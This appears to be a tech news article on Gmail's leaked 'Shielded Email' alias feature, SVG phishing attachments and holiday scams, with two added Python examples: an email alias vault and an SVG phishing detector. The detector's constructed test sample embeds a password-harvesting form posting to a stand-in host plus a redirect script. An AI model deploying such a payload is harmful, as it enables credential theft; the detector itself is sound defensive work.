Updated on November 18 with a new email threat warning as malicious image attachments are found evading existing security measures, and a law enforcement alert for dangerous email links as the holiday season approaches.
Google’s ongoing campaign to narrow the security and privacy gap between Android and iPhone, and between the wider Google and Apple ecosystems, has just taken its latest twist. For 2 billion Gmail users, this could completely change how you use email.
Apple’s Hide My Email feature lets users keep their personal email addresses private, away from the information brokers who sell lists of email addresses and phone numbers that drive the global scourge of spam and cold calling.
Now it seems Google has decided to follow suit—a surprise decision no-one saw coming and which was not touted with the other privacy and security updates this year. Per Android Authority, “sure, Gmail is an absolute champ at filtering out spam, but every time you share your email with someone even a little bit shady, do you feel like you’re playing with fire and risking a whole bunch of unwanted contact? Google may just have a solution in the works, at least by the looks of our latest teardown.”
“With Hide My Email,” Apple explains, “you can generate unique, random email addresses that forward to your personal email account, so you don’t have to share your real email address when filling out forms or signing up for newsletters on the web, or when sending email.”
While this lets users forward mail sent to these ghost addresses to any email address associated with their iCloud account, it really comes into its own when used with Apple’s own Mail and Safari apps. That allows you to send messages directly from those shielded addresses, and also offers the option to create a ghost email address on the spot whenever a form in Safari asks for one.
Android Authority tore down the new 24.45.33 APK release of Google Play Services and, “upon cracking it open,” found “a whole boatload of strings referencing and in support of something called ‘Shielded Email’.”
The strings describe a system “to create single-use or limited-use email aliases that will forward messages along to your primary account.” And while “we could imagine that something like this might be pretty useful in Chrome,” which would mirror Apple’s approach, this reveal is focused instead on “specifically addressing apps that ask for your email address,” which is why it has turned up in a Play Services update.
Again, just as with Apple and iPhone, this likely won’t be restricted to Gmail, but Google will only have full control over how shielded addresses work and are used where it controls the email platform itself, which means Gmail.
This is a laudable move on Google’s part, and if it catches on as Apple’s Hide My Email has, it is a big improvement for Android users, most of whom have one or more Gmail addresses associated with their accounts.
As noted by 9to5Google, “the experience looks to be integrated with Android’s autofill and presumably the Google Password Manager… It remains to be seen whether Google will charge for Shielded Email. Besides encouraging people to sign-up for Google One, making it paid could be a way to make sure functionality isn’t abused.”
Coming on the back of live threat detection and spam call warnings, it’s clear that the security and privacy gap is narrowing. The only question for Android users is how fast these updates roll out, and which device OEMs will get them. Given what we’ve seen already this week, this update will likely come to Pixels first, another concern for Samsung users currently in the queue for new features.
For now, unlike Apple’s alternative, this leaked update appears to be mobile only: it is for Android users, and there’s no news as yet on whether it will make its way into desktop Gmail and other Google services accessed via Chrome. Once it is available, it would make sense to mirror Apple’s application of Hide My Email across the full Google/Gmail ecosystem, not just apps.
There are also third-party apps that do the same, whether with one-time cloaked email addresses or a universal email address for use on websites and other services where you fear scams or your details making their way onto nefarious lists.
The two key benefits of cloaked email addresses are that you can immediately identify scams, because a unique alias tells you where your email address was harvested, so you can filter mail to that alias straight into the trash; and that you prevent cross-contamination, since attackers never see your real email address, which is also likely the login for other sites and services.
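The attribution and filtering described above only work if each alias is unique to one service and cannot be guessed from another. The following is an added example, not code from Google, Apple or any alias provider mentioned here: it mints one alias per service with a short HMAC tag, so a spammer who has seen the shop alias cannot mint a plausible bank alias by hand, and it sorts inbound mail into deliver / revoked / forged / unissued / not-alias while recording which service each alias was given to. The domain `example.net`, the key, the service names and the sample messages are all constructed for the demo.

```python
"""Per-service email aliases with a verifiable tag, plus an inbound filter that
attributes each message to the service the alias was handed to.

Added example, not code from Google, Apple or any alias provider named in the
article. ALIAS_DOMAIN, the service names and the sample messages are constructed.
"""
import hashlib
import hmac

ALIAS_DOMAIN = "example.net"   # assumption: a domain whose mail you control
TAG_LEN = 8                    # hex chars of the HMAC kept in the alias


class AliasVault:
    """Issues one alias per service and remembers which service received it.

    Alias format: <service>-<tag>@ALIAS_DOMAIN, tag = HMAC-SHA256(key, service)
    truncated. The tag stops a spammer who has seen shop-<tag> from minting
    bank-<tag> by hand; the issued/revoked sets let you cut off an alias once
    it starts receiving junk without losing the attribution.
    """

    def __init__(self, key: bytes):
        self._key = key
        self._issued: dict[str, str] = {}   # alias -> service
        self._revoked: set[str] = set()

    def _tag(self, service: str) -> str:
        mac = hmac.new(self._key, service.encode(), hashlib.sha256)
        return mac.hexdigest()[:TAG_LEN]

    def issue(self, service: str) -> str:
        service = service.strip().lower()
        alias = f"{service}-{self._tag(service)}@{ALIAS_DOMAIN}"
        self._issued[alias] = service
        return alias

    def revoke(self, alias: str) -> None:
        self._revoked.add(alias.strip().lower())

    def classify(self, rcpt: str) -> tuple[str, str]:
        """Map a recipient address to (verdict, service).

        Verdicts: deliver, revoked, forged (bad tag), unissued (valid tag but
        never handed out, which hints at a leaked key), not-alias (real address).
        """
        rcpt = rcpt.strip().lower()
        local, at, domain = rcpt.rpartition("@")
        if not at or domain != ALIAS_DOMAIN:
            return ("not-alias", "")
        service, dash, tag = local.rpartition("-")
        if not dash or not hmac.compare_digest(tag.encode(), self._tag(service).encode()):
            return ("forged", service)
        if rcpt in self._revoked:
            return ("revoked", service)
        if rcpt in self._issued:
            return ("deliver", service)
        return ("unissued", service)


def triage(vault: AliasVault, messages: list[dict]) -> dict[str, list[dict]]:
    """Sort inbound messages by verdict; each entry keeps the attributed service
    so a scam aimed at the shop alias is reported as harvested from 'shop'."""
    report: dict[str, list[dict]] = {
        k: [] for k in ("deliver", "revoked", "forged", "unissued", "not-alias")}
    for m in messages:
        verdict, service = vault.classify(m["to"])
        report[verdict].append({"service": service, "from": m["from"], "subject": m["subject"]})
    return report


def demo() -> dict[str, list[dict]]:
    vault = AliasVault(key=b"constructed-demo-key-do-not-reuse")
    shop = vault.issue("shop")
    forum = vault.issue("forum")
    vault.revoke(forum)              # the forum alias started attracting spam
    # Constructed inbound mail: one legitimate, one to the revoked alias, one to
    # a hand-edited alias with a bogus tag, one straight to the real address.
    inbound = [
        {"to": shop, "from": "orders@shop.invalid", "subject": "Your order has shipped"},
        {"to": forum.upper(), "from": "promo@spam.invalid", "subject": "You won a prize"},
        {"to": f"bank-{'0' * TAG_LEN}@{ALIAS_DOMAIN}", "from": "alerts@spam.invalid",
         "subject": "Verify your account"},
        {"to": "me@mail.invalid", "from": "friend@home.invalid", "subject": "Dinner?"},
    ]
    return triage(vault, inbound)


if __name__ == "__main__":
    for verdict, entries in demo().items():
        for e in entries:
            print(f"{verdict:9} service={e['service'] or '-':6} from={e['from']}  {e['subject']}")
```

The tag is deliberately short because it only has to defeat guessing, not cryptographic forgery at scale; the vault's issued set is the real gate, and a valid tag that was never issued is surfaced separately because it is the one signal that the key itself may have leaked.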
The increasing tradecraft of phishing emails has just been highlighted, with Bleeping Computer reporting that “threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. Most images on the web are JPG or PNG files, which are made of grids of tiny squares called pixels. Each pixel has a specific color value, and together, these pixels form the entire image. SVG, or Scalable Vector Graphics, displays images differently, as instead of using pixels, the images are created through lines, shapes, and text described in textual mathematical formulas in the code.”
The point of using such tactics is twofold: to evade automated detection on phones and computers, because an SVG is XML text rather than a bitmap and can carry clickable links, embedded HTML or script that a filter treating it as just another image may never inspect; and to better trick users into clicking where they shouldn’t or completing forms designed to steal personal or financial information as quickly as possible, before suspicions are raised.
“Other SVG attachments used in a recent campaign,” Bleeping Computer says, “pretend to be official documents or requests for more information, prompting you to click the download button, which then downloads malware from a remote site.”
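What makes an SVG attachment worth a second look is exactly the property the quoted report describes: it is text, so it can contain things a picture cannot. The following is an added example, not code from the article or from Bleeping Computer, that does a static triage of an SVG file and flags the indicators behind the campaigns described above: `<script>` elements, `on*` event-handler attributes, `<foreignObject>` (which can wrap an entire HTML login form), embedded HTML form elements, `javascript:`/`data:`/remote URIs in `href`, `src` or `action`, and long base64 runs that usually hide a redirect or second stage. The two sample attachments and the `.invalid` hostnames are constructed. It uses the standard-library XML parser; on untrusted mail in production, swap in `defusedxml` (same API) to close off entity-expansion attacks.

```python
"""Static triage of an SVG email attachment for phishing and malware indicators.

Added example; it is not code from the article or from Bleeping Computer's
report, and the two sample attachments below are constructed. It uses the
standard-library parser; for untrusted input in production, parse with
defusedxml (same API, guards against entity-expansion attacks) instead.
"""
import re
import xml.etree.ElementTree as ET

EVENT_HANDLER = re.compile(r"on[a-z]+")               # onload, onclick, onerror ...
REMOTE_URI = re.compile(r"https?://", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")   # long base64 run in text
ACTIVE_HTML = {"iframe", "embed", "object", "form", "input", "meta"}


def _local(qname: str) -> str:
    """Drop the '{namespace}' prefix ElementTree puts on tags and attributes,
    so xlink:href and plain href are both seen as 'href'."""
    return qname.rsplit("}", 1)[-1].lower()


def triage_svg(data: bytes) -> list[str]:
    """Return findings (empty list = nothing suspicious).

    An SVG is XML text, so unlike a PNG it can hold <script>, event-handler
    attributes, links, and whole HTML documents inside <foreignObject>. Each of
    those is flagged, as are javascript:/data:/remote URIs and base64 blobs.
    """
    findings: list[str] = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML ({exc}); treat as suspicious"]

    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")

    for el in root.iter():
        name = _local(el.tag)
        if name == "script":
            findings.append("<script> element present")
        elif name == "foreignobject":
            findings.append("<foreignObject> present (can embed an HTML form)")
        elif name in ACTIVE_HTML:
            findings.append(f"HTML <{name}> element embedded")

        for attr, value in el.attrib.items():
            a, v = _local(attr), value.strip()
            if EVENT_HANDLER.fullmatch(a):
                findings.append(f"event handler {a}= on <{name}>")
            elif a in ("href", "src", "action"):
                low = v.lower()
                if low.startswith("javascript:"):
                    findings.append(f"javascript: URI in {a} on <{name}>")
                elif low.startswith("data:"):
                    findings.append(f"data: URI in {a} on <{name}>")
                elif REMOTE_URI.match(low):
                    findings.append(f"remote {a} on <{name}>: {v}")

        if el.text and B64_BLOB.search(el.text):
            findings.append(f"base64-looking blob inside <{name}>")
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(triage_svg(data))


# Constructed sample: a fake "invoice" that links out, embeds a credential
# form via foreignObject, and carries an obfuscated script. Hosts use the
# reserved .invalid TLD.
_B64 = "QUJDREVG" * 20
MALICIOUS_SVG = f"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="600" height="400" onload="init()">
  <text x="20" y="40">Invoice INV-0001.pdf - click to open</text>
  <a xlink:href="http://login-portal.invalid/verify">
    <rect x="20" y="60" width="200" height="40" fill="#2a7"/>
  </a>
  <foreignObject x="0" y="120" width="600" height="200">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <form action="http://login-portal.invalid/collect" method="post">
        <input name="password" type="password"/>
      </form>
    </body>
  </foreignObject>
  <script>var p = atob("{_B64}"); location = p;</script>
</svg>
""".encode()

# Constructed sample: an ordinary icon, which should produce no findings.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#09f"/>
</svg>"""


if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", triage_svg(blob) or "clean")
```

Anything that fails to parse is reported rather than passed, since a deliberately malformed file is a common way to slip past a lenient browser while confusing a strict scanner. A mail gateway would run this on every `image/svg+xml` part and either quarantine on any finding or, for the lower-risk ones such as a remote link, rewrite the attachment to a rasterised preview.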
We are now entering the holiday season, which is a scammer’s paradise and we have already seen multiple warnings that malicious websites and manipulated search results are waiting to lure victims. All of these sites will pull traffic from social media, messaging apps, phishing emails or search engine poisoning.
UK law enforcement has just warned shoppers “to exercise vigilance against any tactics that push them to act quickly without thinking, warning that criminals often create false urgency by using limited-time offers or promoting items that seem scarce or not widely available.”
Again—remember the lure. Putting SEO poisoning aside, which is itself a growing threat, the reality is that falling victim is all in the hook. Your best chance to stop an attack before falling victim is to spot the initial approach.
“Our message to anyone shopping online as we approach Black Friday is simple,” the UK’s cybersecurity agency warns. “If you come across anything that doesn’t feel right – stop what you’re doing, break contact, and do not click any links.”
The reality is that email remains a rudimentary technology compared with other platforms, and it’s all too easy for an attacker to blast out a malicious campaign to tens of thousands of victims at a time. Our email clients are still not good at detecting such attacks, especially on small mobile screens, which hide much of the information (the full sender address, where a link really points) that might arouse suspicion on a larger device.
And so, the fact this new Google offering is mobile only for now is unsurprising—your mobile device is fast becoming the largest threat to your data security and privacy, which extends to your work if you bring your device into the office or connect to company systems as most of us now do.
Zimperium’s Nico Chiaraviglio has just warned of “a strategic evolution in mobile security – evasive cyberattacks are now the new normal, as cybercriminals are becoming more sophisticated in their mobile phishing attacks.” This is clear in the weekly reports of new mobile malware campaigns. Almost all such attacks begin with phishing lures, which arrive via social media, messaging apps or email.
Chiaraviglio now predicts that by next year ‘mishing,’ or mobile phishing, attacks “will become so sophisticated and evasive that modern tooling won’t be able to detect it. We will see the rise of AI-driven mobile malware capable of mimicking user behavior, making it far harder to detect using traditional methods.” Not only is the mobile phone central to this threat, but Android is more vulnerable than iPhone, making defenses on Google’s platform more critical.
Bottom line: when this new Gmail email cloaking makes it onto your device (there is no confirmation on timing as yet), make sure you use it.